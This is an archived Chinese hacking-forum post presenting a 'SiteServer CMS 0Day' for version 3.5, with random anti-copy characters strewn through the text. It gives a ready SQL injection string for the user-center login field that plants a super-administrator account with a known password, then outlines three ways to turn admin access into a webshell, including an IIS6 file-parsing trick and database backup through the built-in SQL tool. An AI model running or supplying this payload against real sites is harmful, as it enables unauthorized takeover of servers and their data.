找回密码
 立即注册
查看: 2949|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
经测试秒杀最新的3.5版% J' E' U6 i4 Z7 a! q. n

; m2 T+ j. v- T; T) t) l+ K0 Fstieserver官网:www.siteserver.cn
) C/ j9 Q# h0 s9 U: J" I, `+ ^$ H$ |2 K! R  e
$ [( l1 E& e6 n3 k  X

: C4 E( {8 J. z1 V) C4 xEXP:9 b0 c/ e( |& Y
% H! w6 ^" A% L% }; U
直接访问UserCenter/login.aspx
) I$ c) T. M9 Q, }3 }  G; p
2 D" c+ v9 E6 G" H7 s
1 R) \0 d" x/ a$ _; E
2 b, G: D, L' c" P7 j3 V( n用户名处输入:
% N) j* }% j6 Z! l' y" v" f6 ^6 j  w! H5 T
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
6 g6 N0 }7 E3 O6 Y/ T" e
) [2 d" x* {) B( c! ?
% o/ O! a9 R$ n1 M) }3 l' u+ j$ I4 T+ y/ C( j+ E
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。: j: k! X0 X$ d: k, b3 F3 m

5 ?& P0 [6 {3 k* W% C) W# o
. q* J: P# o) p  M! j0 A8 j
7 w) U# c6 U$ c之后再访问后台SiteServer/login.aspx用插入的用户登陆
; U7 h# L8 R; l) W( f' T
% M6 O& ^3 x2 X% X6 S8 a6 e2 e) L
. X' L& }' D/ u% S* \* N$ w# t3 V1 ^
后台拿webshell的三种方法:
; T0 m% N3 K6 A1 T: H3 b" R$ s( W, I* w. q. v2 ?
一、. f0 q: X5 d7 n: W
8 g! \! ?* I5 W. y7 h, T
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx$ T2 o% W/ a! S  p

- ?: a6 y/ d5 @% B( W" q) x二、
& F) o! @/ S) R- i( o3 r- h4 D( \2 u# `  T7 l& k2 `7 c
成员权限-》添加用户-》用户名为:1.asp
9 s9 b" T, Y& F5 v
2 _! i- {6 S0 L6 J, n. P, h6 ~http://127.0.0.1/usercenter/% H( U2 g' T( j, i4 \& ]5 E/ K
1 x' e8 |) ~7 Z2 a. n1 T0 M
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
% j/ d3 c2 ?" N6 r( c# k( a. N
+ w/ o! S: O" B1 H( L/ h9 X7 _3 n. ~(ps:后台添加用户时不会验证是否含有非法字符)1 o( J6 R& @) Y! i) X2 d1 Y
( C% E6 Y& _8 `5 u* T- J' L* I
三、% N6 B% v: c' E8 E* k, j- B

4 V7 c2 ^9 ~4 q4 q# \7 A; \( o系统工具-》实用工具-》机器参数查看* M. i$ S: N+ V  M7 d" ~
可以看到数据库类型、名称,WEB路径
+ f/ F0 r! q7 X" D  C) P/ c+ E: J: h( v2 Q- ]  a* c
系统工具-》数据库工具-》SQL语句查询/ G: ?- ]$ C$ C. T: J3 t! g
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
! ~# ~8 M6 k: _$ g. y, Z
$ E" b$ P8 ?8 l: f/ o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表